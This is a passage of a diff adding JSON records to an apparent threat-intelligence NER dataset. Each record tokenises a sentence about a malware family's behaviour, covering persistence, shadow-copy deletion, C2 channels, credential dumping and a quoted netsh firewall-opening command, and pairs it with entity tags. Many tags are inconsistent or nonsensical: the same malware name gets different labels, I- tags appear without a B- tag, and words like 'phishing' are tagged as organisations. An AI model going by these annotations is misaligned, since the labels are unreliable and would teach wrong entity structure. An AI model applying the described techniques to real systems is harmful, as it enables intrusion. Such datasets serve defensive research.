], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "collect", + "the", + "OS,", + "and", + "build", + "version", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "has", + "used", + "<code>Accept-Language</code>", + "to", + "identify", + "hosts", + "in", + "the", + "United", + "Kingdom,", + "United", + "States,", + "France,", + "and", + "Spain." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Area", + "O", + "I-Area", + "O", + "B-Area", + "O", + "B-Area" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "identify", + "the", + "country", + "code", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "enumerate", + "the", + "IP", + "and", + "domain", + "of", + "a", + "target", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "identify", + "the", + "user", + "id", + "on", + "a", + "target", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "sleep", + "for", + "195", + "-", + "205", + "seconds", + "after", + "payload", + "execution", + "and", + "before", + "deleting", + "its", + "task." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "has", + "the", + "ability", + "to", + "use", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "use", + "the", + "Windows", + "Command", + "Shell", + "to", + "execute", + "commands,", + "including", + "its", + "own", + "removal." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GuLoader", + "can", + "delete", + "its", + "executable", + "from", + "the", + "<code>AppData\\Local\\Temp</code>", + "directory", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GuLoader", + "can", + "download", + "further", + "malware", + "for", + "execution", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "GuLoader", + "executable", + "has", + "been", + "retrieved", + "via", + "embedded", + "macros", + "in", + "malicious", + "Word", + "documents." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "GuLoader", + "has", + "relied", + "upon", + "users", + "clicking", + "on", + "links", + "to", + "malicious", + "documents." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GuLoader", + "can", + "use", + "a", + "number", + "of", + "different", + "APIs", + "for", + "discovery", + "and", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GuLoader", + "has", + "the", + "ability", + "to", + "inject", + "shellcode", + "into", + "a", + "donor", + "processes", + "that", + "is", + "started", + "in", + "a", + "suspended", + "state.", + "GuLoader", + "has", + "previously", + "used", + "RegAsm", + "as", + "a", + "donor", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GuLoader", + "can", + "establish", + "persistence", + "via", + "the", + "Registry", + "under", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "GuLoader", + "has", + "been", + "spread", + "in", + "phishing", + "campaigns", + "using", + "malicious", + "web", + "links." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GuLoader", + "has", + "the", + "ability", + "to", + "perform", + "anti-VM", + "and", + "anti-sandbox", + "checks", + "using", + "string", + "hashing,", + "the", + "API", + "call", + "<code>EnumWindows</code>,", + "and", + "checking", + "for", + "Qemu", + "guest", + "agent." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GuLoader", + "has", + "the", + "ability", + "to", + "perform", + "anti-debugging", + "based", + "on", + "time", + "checks,", + "API", + "calls,", + "and", + "CPUID." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "GuLoader", + "can", + "use", + "HTTP", + "to", + "retrieve", + "additional", + "binaries." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GuLoader", + "has", + "the", + "ability", + "to", + "download", + "malware", + "from", + "Google", + "Drive." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "H1N1", + "bypasses", + "user", + "access", + "control", + "by", + "using", + "a", + "DLL", + "hijacking", + "vulnerability", + "in", + "the", + "Windows", + "Update", + "Standalone", + "Installer", + "(wusa.exe)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "H1N1", + "dumps", + "usernames", + "and", + "passwords", + "from", + "Firefox,", + "Internet", + "Explorer,", + "and", + "Outlook." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "H1N1", + "obfuscates", + "C2", + "traffic", + "with", + "an", + "altered", + "version", + "of", + "base64." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "H1N1", + "kills", + "and", + "disables", + "services", + "for", + "Windows", + "Firewall." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "H1N1", + "kills", + "and", + "disables", + "services", + "for", + "Windows", + "Security", + "Center,", + "and", + "Windows", + "Defender." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "B-SecTeam", + "B-SecTeam" + ] + }, + { + "tokens": [ + "H1N1", + "contains", + "a", + "command", + "to", + "download", + "and", + "execute", + "a", + "file", + "from", + "a", + "remotely", + "hosted", + "URL", + "using", + "WinINet", + "HTTP", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "H1N1", + "disable", + "recovery", + "options", + "and", + "deletes", + "shadow", + "copies", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "H1N1", + "uses", + "multiple", + "techniques", + "to", + "obfuscate", + "strings,", + "including", + "XOR." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "H1N1", + "has", + "functionality", + "to", + "copy", + "itself", + "to", + "removable", + "media." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "H1N1", + "uses", + "a", + "custom", + "packing", + "algorithm." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "H1N1", + "encrypts", + "C2", + "traffic", + "using", + "an", + "RC4", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "H1N1", + "has", + "functionality", + "to", + "copy", + "itself", + "to", + "network", + "shares." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "H1N1", + "kills", + "and", + "disables", + "services", + "by", + "using", + "cmd.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "HALFBAKED", + "can", + "delete", + "a", + "specified", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HALFBAKED", + "can", + "execute", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "HALFBAKED", + "can", + "obtain", + "information", + "about", + "running", + "processes", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HALFBAKED", + "can", + "obtain", + "screenshots", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HALFBAKED", + "can", + "obtain", + "information", + "about", + "the", + "OS,", + "processor,", + "and", + "BIOS." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HALFBAKED", + "can", + "use", + "WMI", + "queries", + "to", + "gather", + "system", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "HAMMERTOSS", + "exfiltrates", + "data", + "by", + "uploading", + "it", + "to", + "accounts", + "created", + "by", + "the", + "actors", + "on", + "Web", + "cloud", + "storage", + "providers", + "for", + "the", + "adversaries", + "to", + "retrieve", + "later." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAMMERTOSS", + "has", + "used", + "<code>-WindowStyle", + "hidden</code>", + "to", + "conceal", + "PowerShell", + "windows." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "The", + "\"tDiscoverer\"", + "variant", + "of", + "HAMMERTOSS", + "establishes", + "a", + "C2", + "channel", + "by", + "downloading", + "resources", + "from", + "Web", + "services", + "like", + "Twitter", + "and", + "GitHub.", + "HAMMERTOSS", + "binaries", + "contain", + "an", + "algorithm", + "that", + "generates", + "a", + "different", + "Twitter", + "handle", + "for", + "the", + "malware", + "to", + "check", + "for", + "instructions", + "every", + "day." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAMMERTOSS", + "is", + "known", + "to", + "use", + "PowerShell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "HAMMERTOSS", + "is", + "controlled", + "via", + "commands", + "that", + "are", + "appended", + "to", + "image", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Before", + "being", + "appended", + "to", + "image", + "files,", + "HAMMERTOSS", + "commands", + "are", + "encrypted", + "with", + "a", + "key", + "composed", + "of", + "both", + "a", + "hard-coded", + "value", + "and", + "a", + "string", + "contained", + "on", + "that", + "day's", + "tweet.", + "To", + "decrypt", + "the", + "commands,", + "an", + "investigator", + "would", + "need", + "access", + "to", + "the", + "intended", + "malware", + "sample,", + "the", + "day's", + "tweet,", + "and", + "the", + "image", + "file", + "containing", + "the", + "command." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "\"Uploader\"", + "variant", + "of", + "HAMMERTOSS", + "visits", + "a", + "hard-coded", + "server", + "over", + "HTTP/S", + "to", + "download", + "the", + "images", + "HAMMERTOSS", + "uses", + "to", + "receive", + "commands." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "download", + "and", + "execute", + "a", + "second-stage", + "payload." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "collect", + "system", + "information,", + "including", + "computer", + "name,", + "system", + "manufacturer,", + "IsDebuggerPresent", + "state,", + "and", + "execution", + "path." + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "collect", + "the", + "victim", + "user", + "name." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HARDRAIN", + "opens", + "the", + "Windows", + "Firewall", + "to", + "modify", + "incoming", + "connections." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HARDRAIN", + "binds", + "and", + "listens", + "on", + "port", + "443", + "with", + "a", + "FakeTLS", + "method." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "HARDRAIN", + "uses", + "FakeTLS", + "to", + "communicate", + "with", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HARDRAIN", + "uses", + "the", + "command", + "<code>cmd.exe", + "/c", + "netsh", + "firewall", + "add", + "portopening", + "TCP", + "443", + "\"adp\"</code>", + "and", + "makes", + "the", + "victim", + "machine", + "function", + "as", + "a", + "proxy", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HARDRAIN", + "uses", + "cmd.exe", + "to", + "execute", + "<code>netsh</code>commands." + ], + "ner_tags": [ + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAWKBALL", + "has", + "encrypted", + "data", + "with", + "XOR", + "before", + "sending", + "it", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAWKBALL", + "has", + "used", + "an", + "OLE", + "object", + "that", + "uses", + "Equation", + "Editor", + "to", + "drop", + "the", + "embedded", + "shellcode." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAWKBALL", + "has", + "encrypted", + "the", + "payload", + "with", + "an", + "XOR-based", + "algorithm." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAWKBALL", + "has", + "sent", + "system", + "information", + "and", + "files", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAWKBALL", + "has", + "exploited", + "Microsoft", + "Office", + "vulnerabilities", + "CVE-2017-11882", + "and", + "CVE-2018-0802", + "to", + "deliver", + "the", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAWKBALL", + "has", + "the", + "ability", + "to", + "delete", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "HAWKBALL", + "has", + "leveraged", + "several", + "Windows", + "API", + "calls", + "to", + "create", + "processes,", + "gather", + "disk", + "information,", + "and", + "detect", + "debugger", + "activity." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "HAWKBALL", + "can", + "collect", + "the", + "OS", + "version,", + "architecture", + "information,", + "and", + "computer", + "name." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAWKBALL", + "can", + "collect", + "the", + "user", + "name", + "of", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAWKBALL", + "has", + "used", + "HTTP", + "to", + "communicate", + "with", + "a", + "single", + "hard-coded", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAWKBALL", + "has", + "created", + "a", + "cmd.exe", + "reverse", + "shell,", + "executed", + "commands,", + "and", + "uploaded", + "output", + "via", + "the", + "command", + "line." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HDoor", + "kills", + "anti-virus", + "found", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HDoor", + "scans", + "to", + "identify", + "open", + "ports", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HELLOKITTY", + "can", + "use", + "an", + "embedded", + "RSA-2048", + "public", + "key", + "to", + "encrypt", + "victim", + "data", + "for", + "ransom." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HELLOKITTY", + "can", + "delete", + "volume", + "shadow", + "copies", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HELLOKITTY", + "has", + "the", + "ability", + "to", + "enumerate", + "network", + "resources." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "HELLOKITTY", + "can", + "search", + "for", + "specific", + "processes", + "to", + "terminate." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HELLOKITTY", + "can", + "enumerate", + "logical", + "drives", + "on", + "a", + "target", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HELLOKITTY", + "can", + "use", + "WMI", + "to", + "delete", + "volume", + "shadow", + "copies." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HIDEDRV", + "injects", + "a", + "DLL", + "for", + "Downdelph", + "into", + "the", + "explorer.exe", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "HIDEDRV", + "is", + "a", + "rootkit", + "that", + "hides", + "certain", + "operating", + "system", + "artifacts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "strings", + "in", + "HOMEFRY", + "are", + "obfuscated", + "with", + "XOR", + "x56." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HOMEFRY", + "can", + "perform", + "credential", + "dumping." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HOMEFRY", + "uses", + "a", + "command-line", + "interface." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "can", + "enumerate", + "device", + "drivers", + "located", + "in", + "the", + "registry", + "at", + "`HKLM\\Software\\WBEM\\WDM`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "modified", + "the", + "firewall", + "using", + "netsh." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "used", + "its", + "C2", + "channel", + "to", + "exfiltrate", + "data." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Purp" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "multiple", + "C2", + "channels", + "in", + "place", + "in", + "case", + "one", + "fails." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "been", + "observed", + "enumerating", + "system", + "drives", + "and", + "partitions." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "the", + "ability", + "to", + "connect", + "to", + "a", + "remote", + "host", + "in", + "order", + "to", + "upload", + "and", + "download", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "modified", + "Managed", + "Object", + "Format", + "(MOF)", + "files", + "within", + "the", + "Registry", + "to", + "run", + "specific", + "commands", + "and", + "create", + "persistence", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "connected", + "outbound", + "over", + "TCP", + "port", + "443", + "with", + "a", + "FakeTLS", + "method." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "been", + "observed", + "loading", + "several", + "APIs", + "associated", + "with", + "Pass", + "the", + "Hash." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "B-OffAct", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "injected", + "into", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "multiple", + "proxy", + "options", + "that", + "mask", + "traffic", + "between", + "the", + "malware", + "and", + "the", + "remote", + "operators." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Org" + ] + }, + { + "tokens": [ + "A", + "variant", + "of", + "HOPLIGHT", + "hooks", + "lsass.exe,", + "and", + "lsass.exe", + "then", + "checks", + "the", + "Registry", + "for", + "the", + "data", + "value", + "'rdpproto'", + "under", + "the", + "key", + "<code>SYSTEM\\CurrentControlSet\\Control\\Lsa", + "Name</code>." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "the", + "capability", + "to", + "harvest", + "credentials", + "and", + "passwords", + "from", + "the", + "SAM", + "database." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "used", + "svchost.exe", + "to", + "execute", + "a", + "malicious", + "DLL", + "." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "utilized", + "Zlib", + "compression", + "to", + "obfuscate", + "the", + "communications", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "been", + "observed", + "collecting", + "victim", + "machine", + "information", + "like", + "OS", + "version,", + "volume", + "information,", + "and", + "more." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "been", + "observed", + "collecting", + "system", + "time", + "from", + "victim", + "machines." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "can", + "launch", + "cmd.exe", + "to", + "execute", + "commands", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "has", + "used", + "WMI", + "to", + "recompile", + "the", + "Managed", + "Object", + "Format", + "(MOF)", + "files", + "in", + "the", + "WMI", + "repository." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "HOPLIGHT", + "can", + "use", + "WMI", + "event", + "subscriptions", + "to", + "create", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTRAN", + "can", + "inject", + "into", + "into", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + 